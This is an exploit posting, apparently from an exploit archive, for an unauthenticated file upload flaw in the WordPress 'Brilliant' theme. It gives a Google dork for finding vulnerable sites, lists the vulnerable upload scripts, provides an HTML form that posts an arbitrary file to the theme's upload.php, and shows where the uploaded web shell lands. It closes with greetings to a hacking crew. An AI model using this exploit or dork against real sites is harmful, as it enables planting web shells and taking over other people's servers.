facebook facebook twitter rss

Wordpress Brilliant Themes CSRF File Upload Vulnerability

Author: AnonBoy , Published: 29-04-2014
############################################################################
# Title : Wordpress Brilliant Themes CSRF File Upload Vulnerability
# Author : AnonBoy
# Date : 29/04/2014
# Facebook => https://www.facebook.com/nufailienafratsim.moechtar
# Vandor : N/a
# Google Dork => inurl:/wp-content/themes/brilliant

# Tested on : Windows 7

############################################################################

exploit : /theme/functions/upload-bg.php
/theme/functions/uploadbg.php
/theme/functions/upload.php

<form enctype="multipart/form-data"
action="http://www.target.com/wp-content/themes/brilliant/theme/functions/upload.php" method="post">
<input type="jpg" name="url" value="./" />
Please choose a file: <input name="uploadfile" type="file" />
<input type="submit" value="upload" />
</form>

shell path will post

Shell Akses ===> http://www.target.com/wp-content/themes/brilliant/theme/functions/{random_name_shell.php}
--------------------------------------------------------------------------------------
[#] Greeting ############################################################################################################################ #



./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan ./Gantengers Crew

AND BIG FAMILY OF ACEH CYBER TEAM

##########################################################################################################################################

Like us on Facebook :